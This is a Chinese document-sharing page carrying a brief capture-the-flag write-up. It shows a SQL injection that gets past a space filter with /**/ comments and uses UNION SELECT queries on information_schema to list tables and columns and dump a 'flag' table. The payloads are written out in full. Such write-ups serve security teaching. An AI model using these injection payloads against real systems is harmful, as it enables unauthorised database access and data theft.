原创力文档- 10
- 0
- 约小于1千字
- 约 4页
- 2018-07-15 发布于上海
- 举报
界面跟上次的一样还是老套路先用1试试没问题用‘试试存在注入点尝试1’ and ‘1’=’1检测到了sql注入大概是检测到了and或者空格?用/**/代替空格试试过去了,果然是检测到了空格用()试试还是/**/好用接着爆表名1’/**/union/**/select/**/table_name/**/from/**/information_schema.tables/**/where/**/’1’=’1表名爆破成功,flag还是一样的敏感接着爆列名1’/**/union/**/select/**/column_name/**/from/**/information_schema.columns/**/where/**/table_name=’flag列名也是flag最后dump数据1’/**/union/**/select/**/flag/**/from/**/flag/**/where/**/’1’=’1Got the flag~~~
您可能关注的文档
最近下载
- 2024年山西国际商务职业学院单招职业适应性测试题库含答案(典型题).docx VIP
- 2024年新高考二卷 .pdf VIP
- 电气安全知识培训(通用)课件.pptx VIP
- BIM建模基础Revit应用整体教学设计.docx VIP
- 2024年山西国际商务职业学院单招职业适应性测试题库含答案(巩固).docx VIP
- tiktok店铺运营协议合同.docx VIP
- 第三周:音乐《我为老师唱首歌》.ppt VIP
- 《高等教育学》课后习题答案.pdf VIP
- 智能机器人系统:智能机器人SLAMPPT教学课件.pptx VIP
- 深度解析(2026)GBT 13177-2008 《核电厂优先电源》.pptx VIP
文档评论(0)